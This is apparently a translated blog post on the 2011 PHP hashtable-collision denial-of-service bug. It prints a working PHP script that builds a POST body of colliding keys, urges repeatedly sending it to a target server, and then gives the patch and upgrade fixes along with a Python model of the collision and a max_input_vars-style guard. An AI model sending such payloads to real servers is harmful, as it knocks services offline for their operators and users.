The bug is described in this article: http://www.laruence.com/2011/12/29/2412.html
Original advisory: http://www.ocert.org/advisories/ocert-2011-003.html
It takes out the vast majority of dynamic languages: with nothing more than an ordinary PC you can bring down N high-spec servers.
Hash DDoS sample code:
<?php
$size = pow(2, 14); // exponent 14 is just an example; 15, 16 or 17 also work
$genpost = "";
$len = 0;
$array = array();
// keys 0, $size, 2*$size, ... all land in the same hashtable bucket
for ($key = 0, $maxKey = ($size - 1) * $size; $key <= $maxKey; $key += $size) {
    $genpost .= ($genpost ? "&" : "") . $key . "=1";
}
$len = strlen($genpost);
$data = "POST <path> HTTP/1.1\r\n"
      . "Host: <host or IP>\r\n"
      . "Content-Type: application/x-www-form-urlencoded\r\n"
      . "Content-Length: {$len}\r\n"
      . "Connection: Close\r\n\r\n"
      . $genpost;
Just keep POSTing the value of $data to the target URL and the target server's CPU will spike until it goes down...
PHP 5.2 can apply this patch:
https://github.com/laruence/laruence.github.com/tree/master/php-5.2-max-input-vars
PHP 5.3 must be upgraded to 5.3.9; otherwise you have to port the 5.2 patch yourself.
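To see why the keys generated above all collide, and what the max_input_vars limit that the patch and 5.3.9 introduce actually enforces, here is an added Python model (not code from the post, from laruence's patch, or from PHP itself). It assumes PHP 5's bucket choice for integer keys, h & (table_size - 1), and uses 1000, the max_input_vars default in 5.3.9, as the limit.

```python
# Added example: model PHP 5 integer-key bucket selection and a
# max_input_vars-style guard. Assumption: PHP 5 hashtables place an
# integer key in bucket (key & nTableMask), nTableMask = table_size - 1,
# with table_size a power of two that doubles as the table grows.

MAX_INPUT_VARS = 1000  # default value of max_input_vars in PHP 5.3.9


def php_bucket(key: int, table_size: int) -> int:
    """Bucket index PHP 5 picks for an integer key (modelled, see above)."""
    return key & (table_size - 1)


def gen_colliding_keys(size: int) -> list:
    """The same key sequence the post generates: 0, size, 2*size, ..."""
    return list(range(0, (size - 1) * size + 1, size))


def bucket_distribution(keys, table_size: int) -> dict:
    """How many keys land in each bucket for a table of the given size."""
    counts = {}
    for k in keys:
        b = php_bucket(k, table_size)
        counts[b] = counts.get(b, 0) + 1
    return counts


def count_input_vars(body: str) -> int:
    """Number of key=value pairs in an application/x-www-form-urlencoded body."""
    return sum(1 for part in body.split("&") if part)


def accept_form_body(body: str, limit: int = MAX_INPUT_VARS) -> bool:
    """True if the body stays under the max_input_vars-style limit."""
    return count_input_vars(body) <= limit


if __name__ == "__main__":
    keys = gen_colliding_keys(2 ** 14)
    # Every multiple of 2**14 masks to bucket 0 at every table size up to
    # 2**14, so the table degenerates into one long chain: O(n^2) inserts.
    for table_size in (8, 1024, 2 ** 14):
        print(table_size, bucket_distribution(keys, table_size))
    body = "&".join(f"{k}=1" for k in keys)  # constructed, same shape as $genpost
    print(len(keys), "vars, accepted:", accept_form_body(body))
```

The count has to be enforced before PHP parses the body, which is what the patch and max_input_vars do inside the engine; a check in your own script runs too late, because $_POST is already built by then.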
